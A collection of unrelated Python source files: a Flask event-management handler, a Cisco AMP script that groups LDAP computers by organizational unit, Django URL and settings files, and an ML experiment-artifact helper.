if not isinstance(json['websites'], list):
raise ValueError("Array of websites provided improperly: " + str(json['websites']))
def _validateItype(itype):
"""
Validates itype.
:param itype: type of interaction
:return: bool
"""
if itype not in ITYPES:
return False
return True
def _validateTimestamp(datestring):
"""
Validates timestamp
:param: datestring
:return: bool
:raises: ValueError
"""
try:
if datestring != datetime.strptime(datestring, DATETIME_FORMAT).strftime(DATETIME_FORMAT):
raise ValueError
return True
except ValueError:
return False
def _validateStartEndDates(start, end):
"""
Validate that Event Start time is not less than the end time.
:param start: Start timestamp
:param end: end timestamp
:return: bool
"""
if datetime.strptime(start, DATETIME_FORMAT) < datetime.strptime(end, DATETIME_FORMAT):
return True
return False
def _validate_uid_eid(uid, eid):
"""
Validate that a User ID and Event ID are integers.
:param uid: User ID
:param eid: Event ID
:raises: ValueError
"""
if not isinstance(uid, int) or uid < 0:
raise ValueError("Invalid uid: " + str(uid))
if not isinstance(eid, int) or eid < 0:
raise ValueError("Invalid eid: " + str(eid))
class EventHandler:
"""
Handler Class to manage getting/creating/modifying events and event-user interactions.
"""
# todo: extract all/most of hardcoded key names to variables.
def createEvent(self, json, uid):
"""Attempt to create an event.
Uses :func:`~app.DAOs.EventDAO.EventDAO.createEvent` as well as:
* :func:`~app.handlers.TagHandler.TagHandler.unpackTags`
* :func:`~app.handlers.WebsiteHandler.WebsiteHandler.validateWebsites`
:param uid: User ID.
:type uid: int
:param json: JSON object with the following keys:
* roomid
* etitle
* edescription
* estart
* eend
* photourl
* websites
* tags
:type json: JSON
:returns JSON Response Object: JSON Response Object containing success or error response.
"""
for key in CREATEEVENTKEYS:
if key not in json:
return jsonify(Error='Missing credentials from submission: ' + key), 400
try:
_validateEventParameters(json=json, uid=uid)
tags = TagHandler().unpackTags(json_tags=json['tags'])
WebsiteHandler().validateWebsites(list_of_websites=json['websites'])
except ValueError as e:
return jsonify(Error=str(e)), 400
except KeyError as ke:
return jsonify(Error="Missing Key in JSON: " + str(ke)), 400
if len(tags) < 3 or len(tags) > 10:
return jsonify(Error="Improper number of unique tags provided: " + str(len(tags))), 400
eid = EventDAO().createEvent(ecreator=uid, roomid=json['roomid'], etitle=json['etitle'],
edescription=json['edescription'], estart=json['estart'],
eend=json['eend'], photourl=json['photourl'], tags=tags,
websites=json['websites'])
try:
eid = eid[0]
except TypeError:
return jsonify(Error=str(eid)), 400
return jsonify({"eid": eid}), 201
def getAllDeletedEventsSegmented(self, offset, limit=20):
"""Get all events that have been marked as deleted.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getAllDeletedEventsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param offset: Number of results to skip from top of list.
:type offset: int
:param limit: Number of results to return. Default = 20.
:type limit: int
:returns JSON Response Object: JSON Response Object containing success or error response.
"""
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getAllDeletedEventsSegmented(offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
event_entry = _buildCoreEventResponse(event_tuple=row)
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getAllEventsSegmented(self, offset, limit=20):
"""Get all events.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getAllEventsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param offset: Number of results to skip from top of list.
:type offset: int
:param limit: Number of results to return. Default = 20.
:type limit: int
:returns JSON Response Object: JSON Response Object containing success or error response.
"""
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getAllEventsSegmented(offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
event_entry = _buildCoreEventResponse(event_tuple=row)
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getAllPastEventsSegmented(self, offset, limit=20):
"""Get all events whose end dates are equal to or less than the current timestamp of the database.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getAllPastEventsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param offset: Number of results to skip from top of list.
:type offset: int
:param limit: Number of results to return. Default = 20.
:type limit: int
:returns JSON Response Object: JSON Response Object containing success or error response.
"""
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getAllPastEventsSegmented(offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
event_entry = _buildCoreEventResponse(event_tuple=row)
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getEventByID(self, eid, no_json=False):
"""Return the event entry belonging to the specified eid.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getEventByID` as well as
:func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param eid: Event ID
:type eid: int
:param no_json: States whether or not to return the successful response as a dictionary.
:type no_json: bool
:returns JSON Response Object: JSON Response Object containing success or error response.
"""
if not isinstance(eid, int) or not eid > 0:
return jsonify(Error="Invalid eid: " + str(eid)), 400
event = EventDAO().getEventByID(eid)
if not event:
return jsonify(Error='Event does not exist: eid=' + str(eid)), 404
else:
response = _buildEventResponse(event_tuple=event)
if no_json:
return response
return jsonify(response)
def getEventByIDWithInteraction(self, eid, uid):
"""Return the event entry belonging to the specified eid, plus the user interaction entry for the given uid.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getEventInteractionByUserID` as well as
:func:`~app.handlers.EventHandler.getEventByID`
:param eid: Event ID
:type eid: int
:param uid: User ID
:type uid: int
:returns JSON Response Object: json response with event IDs and tags for each event.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
if not isinstance(eid, int) or not eid > 0:
return jsonify(Error="Invalid eid: " + str(eid)), 400
event_response = self.getEventByID(eid=eid, no_json=True)
# If it's not a dictionary, it is an error JSON.
if not isinstance(event_response, dict):
return event_response
# TODO: consider moving this to User Handler/Dao
user_interaction = EventDAO().getEventInteractionByUserID(eid=eid, uid=uid)
# If no interaction found, object is None; replace with None tuple
if not user_interaction:
user_interaction = [None, None]
event_response["itype"] = user_interaction[0]
event_response["recommendstatus"] = user_interaction[1]
return jsonify(event_response)
def getEventsCreatedAfterTimestamp(self, timestamp, uid):
"""
Get the upcoming active event IDs that a user has not interacted with,
along with the tags for that event.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getEventIDsCreatedAfterTimestamp` as well as:
* :func:`~app.handlers.TagHandler.TagHandler.safeGetTagsByEventID`
* :func:`~app.handlers.EventHandler._validateTimestamp`
:param timestamp: ISO formatted timestamp string. ("%Y-%m-%d %H:%M:%S")
:type timestamp: str
:param uid: the user's ID.
:type uid: int
:returns JSON Response Object: json response with event IDs and tags for each event.
"""
if not isinstance(timestamp, str) or not _validateTimestamp(datestring=timestamp):
return jsonify(Error='Invalid timestamp: ' + str(timestamp)), 400
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
event_ids = EventDAO().getEventIDsCreatedAfterTimestamp(uid=uid, timestamp=timestamp)
if not event_ids:
response = {'events': None}
else:
event_list = []
for row in event_ids:
event_entry = {"eid": row[0], "tags": TagHandler().safeGetTagsByEventID(eid=row[0])}
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getEventsCreatedByUser(self, uid, offset, limit=20):
"""Return the events created by a given user, specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getEventsCreatedByUser` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of events created by a user.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getEventsCreatedByUser(uid=uid, offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
# TODO: consider re-developing Response builders for more flexibility.
event_entry = _buildCoreEventResponse(event_tuple=row)
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getDismissedEvents(self, uid, offset, limit=20):
"""Return the dismissed event entries specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getDismissedEvents` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of events dismissed by a user.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getDismissedEvents(uid=uid, offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
# TODO: consider re-developing Response builders for more flexibility.
event_entry = _buildCoreEventResponse(event_tuple=row)
event_entry['recommendstatus'] = row[11]
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getNewDeletedEvents(self, timestamp):
"""
Get a list of the core information for events deleted at or after the given timestamp.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getNewDeletedEvents` as well as:
* :func:`~app.handlers.EventHandler._validateTimestamp`
* :func:`~app.handlers.EventHandler._buildTinyEventResponse`
:param timestamp: Time used to look for events that have been deleted at or after. ("%Y-%m-%d %H:%M:%S")
:type timestamp: str
:returns JSON Response Object: JSON containing limit-defined number of events dismissed by a user.
"""
if not isinstance(timestamp, str) or not _validateTimestamp(datestring=timestamp):
return jsonify(Error='Invalid timestamp: ' + str(timestamp)), 400
events = EventDAO().getNewDeletedEvents(timestamp=timestamp)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
event_entry = _buildTinyEventResponse(event_tuple=row)
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getPastFollowedEventsSegmented(self, uid, offset, limit=20):
"""Return the user's followed event entries that have ended, specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getPastFollowedEventsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of events followed by a user that have ended.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getPastFollowedEventsSegmented(uid=uid, offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
# TODO: consider re-developing Response builders for more flexibility.
event_entry = _buildCoreEventResponse(event_tuple=row)
event_entry['recommendstatus'] = row[11]
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getUpcomingFollowedEventsSegmented(self, uid, offset, limit=20):
"""Return the upcoming, active, followed event entries specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getUpcomingFollowedEventsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of events followed by a user that have not ended.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getUpcomingFollowedEventsSegmented(uid=uid, offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
# TODO: consider re-developing Response builders for more flexibility.
event_entry = _buildCoreEventResponse(event_tuple=row)
event_entry['recommendstatus'] = row[11]
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getUpcomingGeneralEventsSegmented(self, uid, offset, limit=20):
"""Return the upcoming, active event entries specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getUpcomingGeneralEventsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of events that have not ended.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getUpcomingGeneralEventsSegmented(uid=uid, offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
event_entry = _buildCoreEventResponse(event_tuple=row)
# TODO: Consider reworking generalEventsSegmented and builder.
event_entry['itype'] = row[11]
event_entry['recommendstatus'] = row[12]
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getUpcomingGeneralEventsByKeywordsSegmented(self, uid, searchstring, offset, limit=20):
"""Return the upcoming, active event entries specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getUpcomingGeneralEventsByKeywordsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.SharedValidationFunctions.processSearchString`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param searchstring: String to use as search criteria for general events. Search terms must be separated by whitespaces.
:type searchstring: str
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of events that have not ended and match search criteria.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
# Process keywords to be filtered and separated by pipes.
keywords = SVF.processSearchString(searchstring=searchstring)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getUpcomingGeneralEventsByKeywordsSegmented(uid=uid, keywords=keywords, offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
event_entry = _buildCoreEventResponse(event_tuple=row)
# TODO: Consider reworking generalEventsSegmented and builder.
event_entry['itype'] = row[11]
event_entry['recommendstatus'] = row[12]
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getUpcomingRecommendedEventsSegmented(self, uid, offset, limit=20):
"""Return the upcoming, active, recommended event entries specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getUpcomingRecommendedEventsSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of events recommended to a user that have not ended.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getUpcomingRecommendedEventsSegmented(uid=uid, offset=offset, limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
# TODO: consider re-developing Response builders for more flexibility.
event_entry = _buildCoreEventResponse(event_tuple=row)
event_entry['itype'] = row[11]
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def getUpcomingRecommendedEventsByKeywordSegmented(self, uid, searchstring, offset, limit=20):
"""Return the upcoming, recommended, active event entries specified by offset and limit parameters.
Uses :func:`~app.DAOs.EventDAO.EventDAO.getUpcomingRecommendedEventsByKeywordSegmented` as well as:
* :func:`~app.handlers.SharedValidationFunctions.validate_offset_limit`
* :func:`~app.handlers.SharedValidationFunctions.processSearchString`
* :func:`~app.handlers.EventHandler._buildCoreEventResponse`
:param uid: User ID
:type uid: int
:param searchstring: String to use as search criteria for recommended events. Search terms must be separated by whitespaces.
:type searchstring: str
:param offset: Number of result rows to ignore from top of query results.
:type offset: int
:param limit: Max number of result rows to return. Default=20.
:type limit: int
:returns JSON Response Object: JSON containing limit-defined number of recommended events that have not ended and match search criteria.
"""
if not isinstance(uid, int) or not uid > 0:
return jsonify(Error="Invalid uid: " + str(uid)), 400
try:
SVF.validate_offset_limit(offset=offset, limit=limit)
# Process keywords to be filtered and separated by pipes.
keywords = SVF.processSearchString(searchstring=searchstring)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
events = EventDAO().getUpcomingRecommendedEventsByKeywordSegmented(uid=uid, keywords=keywords, offset=offset,
limit=limit)
if not events:
response = {'events': None}
else:
event_list = []
for row in events:
# TODO: consider re-developing Response builders for more flexibility.
event_entry = _buildCoreEventResponse(event_tuple=row)
event_entry['itype'] = row[11]
event_list.append(event_entry)
response = {'events': event_list}
return jsonify(response)
def setEventStatus(self, uid, eid, estatus):
"""Set the estatus of an event entry to the specified value.
Uses :func:`~app.DAOs.EventDAO.EventDAO.setEventStatus` as well as
:func:`~app.handlers.EventHandler._validate_uid_eid`
:param uid: User ID
:type uid: int
:param eid: Event ID.
:type eid: int
:param estatus: New status for event. Current Accepted statuses: ['active', 'deleted']
:type estatus: str
:returns JSON Response Object: JSON containing successful post response.
"""
try:
_validate_uid_eid(uid=uid, eid=eid)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
if not isinstance(estatus, str) or estatus not in ESTATUS_TYPES:
return jsonify(Error='Invalid estatus = ' + str(estatus)), 400
uid_eid_pair = EventDAO().setEventStatus(eid=eid, estatus=estatus, uid=uid)
try:
return jsonify({"eid": uid_eid_pair[0]}), 201
except TypeError:
return jsonify(Error=str(uid_eid_pair)), 400
def setInteraction(self, uid, eid, itype):
"""Set an eventuserinteractions entry that states the user has interacted with the specified event.
Uses :func:`~app.DAOs.EventDAO.EventDAO.setInteraction` as well as:
* :func:`~app.handlers.EventHandler._validate_uid_eid`
* :func:`~app.handlers.EventHandler._validateItype`
* :func:`~app.handlers.TagHandler.TagHandler.buildCoreUserTagResponse`
* :func:`~app.DAOs.EventDAO.EventDAO.getEventByID`
* :func:`~app.handlers.EventHandler._buildTinyEventResponse`
:param uid: User ID
:type uid: int
:param eid: Event ID.
:type eid: int
:param itype: type of interaction. Currently accepted interactions: ["following", "unfollowed", "dismissed"]
:type itype: str
:returns JSON Response Object: JSON containing post response.
"""
try:
_validate_uid_eid(uid=uid, eid=eid)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
if not isinstance(itype, str) or not _validateItype(itype=itype):
return jsonify(Error="Invalid itype: " + str(itype)), 400
# dao = EventDAO()
result = EventDAO().setInteraction(uid=uid, eid=eid, itype=itype)
# TODO: Implement a better way to do this error handling.
try:
new_usertags = []
for row in result:
new_usertags.append(TagHandler().buildCoreUserTagResponse(tag_tuple=row))
# Calling this within the try block, because if the setInteraction call fails,
# psql will block all transactions until current one finishes, and will cause
# a 500 error instead of the intended 400 below.
event = EventDAO().getEventByID(eid=eid)
tiny_event = _buildTinyEventResponse(event_tuple=event)
response = {}
response['tags'] = new_usertags
response['event'] = tiny_event
return jsonify(response), 201
except TypeError:
return jsonify(Error=str(result)), 400
def setRecommendation(self, uid, eid, recommendstatus):
"""Set an eventuserinteractions entry that states if the specified event has been recommended to the user or not.
Uses :func:`~app.DAOs.EventDAO.EventDAO.setRecommendation` as well as
:func:`~app.handlers.EventHandler._validate_uid_eid`
:param uid: User ID
:type uid: int
:param eid: Event ID.
:type eid: int
:param recommendstatus: qualitative result of recommendation calculation. Currently accepted recommendstatus: ["R", "N"]
:type recommendstatus: str
:returns JSON Response Object: JSON containing post response.
"""
try:
_validate_uid_eid(uid=uid, eid=eid)
except ValueError as ve:
return jsonify(Error=str(ve)), 400
if not isinstance(recommendstatus, str) or recommendstatus not in RECOMMENDATION_TYPES:
return jsonify(Error='Invalid recommendstatus = ' + str(recommendstatus)), 400
uid_eid_pair = EventDAO().setRecommendation(uid=uid, eid=eid, recommendstatus=recommendstatus)
try:
return jsonify({"uid": uid_eid_pair[0],
"eid": uid_eid_pair[1]}), 201
except TypeError:
return jsonify(Error=str(uid_eid_pair)), 400
|
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from smtplib import SMTPException
from ldap3 import Server, Connection, core, SUBTREE
import configparser
import json
import os
import requests
import smtplib
import time
def send_report(recipient, sender_email, smtp_server):
'''Send email with the created log files as attachments. Expects no authentication on smtp server.
'''
subject = 'CSE - Move to group by OU'
body = 'Log files from script "cse_groupByOU.py"'
# Create a multipart message and set headers
message = MIMEMultipart()
message["From"] = sender_email
message["To"] = recipient
message["Subject"] = subject
#message["Bcc"] = receiver_email # Recommended for mass emails
# Add body to email
message.attach(MIMEText(body, "plain"))
files = ['move-log.txt']
for a_file in files:
attachment = open(a_file, 'rb')
part = MIMEBase('application','octet-stream')
part.set_payload(attachment.read())
part.add_header('Content-Disposition',
'attachment',
filename=a_file)
encoders.encode_base64(part)
message.attach(part)
#sends email
try:
smtpObj = smtplib.SMTP(smtp_server)
smtpObj.sendmail(sender_email, recipient, message.as_string())
except SMTPException:
pass
def get_ldap_connection(ldap_server, ldap_port, ldap_ssl, ldap_user, ldap_password):
int_ldap_port = int(ldap_port)
server = Server(ldap_server, port=int_ldap_port, use_ssl=ldap_ssl, get_info='ALL')
try:
ldap_connection = Connection(server, user=ldap_user, password=ldap_password,
fast_decoder=True, auto_bind=True, auto_referrals=True, check_names=False, read_only=True,
lazy=False, raise_exceptions=False)
except core.exceptions.LDAPExceptionError as e:
with open('move-log.txt', 'w', encoding='utf-8') as file_output:
file_output.write('LDAP exception: \n' + str(e) + '\n')
ldap_connection = 0
return ldap_connection
def get_connectors_from_ou(ldap_connection, organizationalUnit):
'''Grab computer names from OU with LDAP and return list
'''
results = list()
elements = ldap_connection.extend.standard.paged_search(
search_base=organizationalUnit,
search_filter='(objectclass=computer)',
search_scope=SUBTREE,
attributes=['name'],
paged_size=100,
generator=False)
for element in elements:
if 'dn' in element:
hostname = element['attributes']['name']
results.append(hostname)
return results
def get_connectors_from_cse(connectors_from_ou, groupGuid, computers_url, auth):
connectors = []
for connector in connectors_from_ou:
url = computers_url + f"?hostname={connector[0]}"
try:
r = requests.get(url, auth=auth)
r.raise_for_status()
except requests.exceptions.RequestException as e:
with open('move-log.txt', 'a', encoding='utf-8') as file_output:
file_output.write('Requests exception: \n' + str(e) + '\n')
connectors = 0
else:
j = json.loads(r.content)
for item in j["data"]:
hostname = item.get('hostname')
guid = item.get('connector_guid')
group = item.get('group_guid')
if group.strip() != groupGuid.strip():
connectors.append((hostname, guid))
# Adding a delay to prevent the API from being overwhelmed with requests
time.sleep(1)
return connectors
def move_to_group(connectors, groupGuid, computers_url, auth):
'''Move connectors to group
'''
with open('move-log.txt', 'a', encoding='utf-8') as file_output:
for connector in connectors:
APICall = requests.session()
url = computers_url + f"{connector[1]}"
headers = {'Content-Type': "application/x-www-form-urlencoded", 'Accept': "application/json"}
payload = f"group_guid={groupGuid.strip()}"
try:
r = APICall.patch(url, auth=auth, data=payload, headers=headers)
r.raise_for_status()
except requests.exceptions.RequestException as e:
with open('move-log.txt', 'a', encoding='utf-8') as file_output:
file_output.write('Requests exception: \n' + str(e) + '\n')
else:
if r.status_code == 202:
file_output.write('{},{},{},{},Success\n'.format(connector[0],
connector[1],
groupGuid.strip(),
r.status_code))
else:
file_output.write('{},{},{},{},Failure\n'.format(connector[0],
connector[1],
groupGuid.strip(),
r.status_code))
# Adding a delay to prevent the API from being overwhelmed with requests
time.sleep(1)
def main():
'''The main logic of the script
'''
# Specify the config file
config_file = 'cse_groupByOU.cfg'
# Reading the config file to get settings
config = configparser.RawConfigParser()
config.read(config_file)
client_id = config.get('CSE', 'client_id')
api_key = config.get('CSE', 'api_key')
cloud = config.get('CSE', 'cloud')
recipient = config.get('EMAIL', 'recipient')
sender_email = config.get('EMAIL', 'sender_email')
smtp_server = config.get('EMAIL', 'smtp_server')
ldap_server = config.get('LDAP', 'ldap_server')
ldap_port = config.get('LDAP', 'ldap_port')
ldap_ssl = config.get('LDAP', 'ldap_ssl')
ldap_user = config.get('LDAP', 'ldap_user')
ldap_password = config.get('LDAP', 'ldap_password')
# Set auth
auth = (client_id, api_key)
# URL to query AMP
if cloud == '':
computers_url = 'https://api.amp.cisco.com/v1/computers/'
else:
computers_url = 'https://api.' + cloud + '.amp.cisco.com/v1/computers/'
# Create log file and write headers.
with open('move-log.txt', 'w', encoding='utf-8') as file_output:
file_output.write('Hostname,GUID,Group Guid,Status code,Status\n')
file_output.close()
# Open file with OU and Group guid and call on functions to move computers for each line
with open('groups_and_OUs.txt', 'r') as f:
ldap_connection = 0
connectors_from_ou = 0
connectors = 0
for line in f:
organizationalUnit, groupGuid = line.split(':')
ldap_connection = get_ldap_connection(ldap_server, ldap_port, ldap_ssl, ldap_user, ldap_password)
# If no ldap connection, do not go further
if ldap_connection != 0:
connectors_from_ou = get_connectors_from_ou(ldap_connection, organizationalUnit)
if connectors_from_ou != 0:
connectors = get_connectors_from_cse(connectors_from_ou, groupGuid, computers_url, auth)
if connectors != 0:
move_to_group(connectors, groupGuid, computers_url, auth)
# Check whether more than one line have been written to log file. If not, don't send email
with open(r"move-log.txt", 'r') as fp:
x = len(fp.readlines())
if x > 1:
send_report(recipient, sender_email, smtp_server)
# Cleanup
os.remove('move-log.txt')
if __name__ == "__main__":
main()
|
from django.urls import path
from snippets import views
urlpatterns = [
path('snippets/', views.snippet_list),
path('snippets/<int:pk>/', views.snippet_detail),
path('snippetz/', views.SnippetList.as_view()),
path('snippetz/<int:pk>/', views.SnippetDetail.as_view()),
path('snippetzz/', views.SnippetListz.as_view()),
path('snippetzz/<int:pk>/', views.SnippetDetailz.as_view()),
path('snippetx/', views.SnippetListz.as_view()),
path('snippetx/<int:pk>/', views.SnippetDetailz.as_view()),
path('users/', views.UserList.as_view()),
path('users/<int:pk>/', views.UserDetail.as_view()),
]
|
from dataclasses import dataclass
from pathlib import Path
from typing import Any, Dict
from utils.files import PickleFile, TarFile
from utils.logger import logger
@dataclass
class ExperimentArtifacts:
run_tag: str
model_name: str
base_path: Path
def _create_if_not_exist(self):
Path(self.output_prefix).mkdir(parents=True, exist_ok=True)
@property
def output_prefix(self):
return self.base_path / self.model_name
def generate_artifacts(self, metrics: Dict[str, Any]):
self.metrics = metrics
logger.info(metrics)
metric_names = []
for k in metrics.keys():
metric_names.append(k)
def save_results(self):
self._create_if_not_exist()
metrics_path = str(self.output_prefix / 'metrics.pkl')
PickleFile.write(metrics_path, self.metrics)
def save(self):
self.save_results()
# Create single output for Sagemaker training-job
@property
def model_package_path(self):
return self.base_path / 'model.tar.gz'
def create_package_with_models(self):
logger.info(f"Loading models from {self.base_path}")
model_paths = {}
for p in sorted(self.base_path.glob("**/*joblib")):
tar_path = f"{p.parent.name}/{p.name}"
model_paths[str(p)] = tar_path
TarFile.compress(self.model_package_path, model_paths)
|
from settings import *
DEBUG = False
SITE_ROOT = ''
LOGIN_URL = SITE_ROOT + "/accounts/login/"
# Theme info
# LOCAL_STATICFILE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__),
# '../../ODC-overlay/static'))
# LOCAL_TEMPLATE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__),
# '../../ODC-overlay/templates'))
# ReCatchpa stuff
RECAPTCHA_PUBLIC_KEY = '6LfU8t8SAAAAAJKrpalcrjlSA6zf9SIJaMBbz33s'
RECAPTCHA_PRIVATE_KEY = ''
# Twitter stuff
TWITTER_USER = None
# AWS Credentials for Warehouse stuff
AWS_ACCESS_KEY = None
AWS_SECRET_KEY = None
# Contacts
# mx_host = 'mycity.gov'
ADMINS = (
('Colin', 'copelco@caktusgroup.com'),
)
CONTACT_EMAILS = ['copelco@caktusgroup.com']
DEFAULT_FROM_EMAIL = 'OpenData Site <noreply@example.com>'
EMAIL_SUBJECT_PREFIX = '[OpenDataCatalog - MYCITY] '
SERVER_EMAIL = 'OpenData Team <info@example.com>'
MANAGERS = (
('Colin', 'copelco@caktusgroup.com'),
)
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': 'opendata', # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
INSTALLED_APPS += (
'gunicorn',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'insecure'
|
from decouple import config
from django.contrib.sites.models import Site
from django.core.management import BaseCommand
from accounts.models.system_user import SystemUser
